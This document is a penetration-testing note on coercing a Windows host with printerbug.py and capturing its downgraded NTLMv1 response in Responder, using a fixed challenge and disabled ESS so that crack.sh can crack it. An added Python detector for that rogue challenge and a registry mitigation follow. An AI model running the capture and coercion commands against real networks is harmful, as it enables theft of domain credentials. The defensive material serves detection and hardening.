Grabbing NTLMv1
If you are able to coerce a system into authenticating to you, you can usually grab its NTLMv1 response and potentially downgrade it to a crackable format.
Start Responder listener:
sudo responder -I eth1 -A -v --disable-ess --ntlmchallenge 1122334455667788
This will make Responder run with these flags:
-I eth1: Run on mentioned interface
-A: Analyze mode (no poison)
-v: verbose
--disable-ess: Disables Extended Session Security (ESS)
--ntlmchallenge: Sets a custom NTLM challenge, to make cracking easier
Set Responder config:
sudo nano /etc/responder/Responder.conf
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
Set the challenge in the config file as well, since the command-line flag doesn't always work.
Coerce system:
python3 printerbug.py company.local/[email protected] 10.1.0.50
Captured:
Note the '1122334455667788' that we set.
This NTLMv1 hash can be cracked within 24 hours using the service https://crack.sh/.
They have rainbow tables specifically for challenge 1122334455667788.
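As an added defender-side example (not from the original notes): both settings above, the fixed challenge 1122334455667788 and ESS being disabled, are visible on the wire in the NTLMSSP CHALLENGE_MESSAGE (Type 2) that the listener sends back, so a network sensor or a packet-capture triage script can flag them. This assumes Python 3.9+; the sample messages are constructed inline rather than captured.

```python
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2
# NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY (MS-NLMP); cleared by --disable-ess
NEGOTIATE_ESS = 0x00080000
# The fixed challenge Responder is configured to send on this page.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


def parse_challenge(msg: bytes) -> dict:
    """Parse the fixed fields of an NTLMSSP CHALLENGE_MESSAGE (Type 2)."""
    if len(msg) < 48 or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type != CHALLENGE_MESSAGE:
        raise ValueError(f"expected Type 2, got Type {msg_type}")
    flags = struct.unpack_from("<I", msg, 20)[0]       # NegotiateFlags
    return {"flags": flags, "challenge": msg[24:32]}  # ServerChallenge


def assess_challenge(msg: bytes) -> list:
    """Return detection findings for one Type 2 message (empty if clean)."""
    parsed = parse_challenge(msg)
    findings = []
    if parsed["challenge"] == STATIC_CHALLENGE:
        findings.append("static-challenge")   # known Responder / crack.sh value
    if not parsed["flags"] & NEGOTIATE_ESS:
        findings.append("ess-disabled")       # NTLMv1 without ESS is crackable
    return findings


def build_challenge(flags: int, challenge: bytes) -> bytes:
    """Constructed sample Type 2 message with empty TargetName and TargetInfo."""
    msg = NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", 0, 0, 56)   # TargetNameFields: len, maxlen, offset
    msg += struct.pack("<I", flags)
    msg += challenge + b"\x00" * 8         # ServerChallenge, Reserved
    msg += struct.pack("<HHI", 0, 0, 56)   # TargetInfoFields
    msg += b"\x00" * 8                     # Version
    return msg


# UNICODE | REQUEST_TARGET | NTLM | ALWAYS_SIGN | TARGET_TYPE_SERVER
BASE_FLAGS = 0x00028205

if __name__ == "__main__":
    rogue = build_challenge(BASE_FLAGS, STATIC_CHALLENGE)
    legit = build_challenge(BASE_FLAGS | NEGOTIATE_ESS, bytes.fromhex("a1b2c3d4e5f60718"))
    print("rogue listener:", assess_challenge(rogue))  # ['static-challenge', 'ess-disabled']
    print("normal server: ", assess_challenge(legit))  # []
```

On the mitigation side, the same downgrade is closed at the source by setting LmCompatibilityLevel to 5 (send NTLMv2 only, refuse LM and NTLMv1), so a coerced host never produces an NTLMv1 response in the first place.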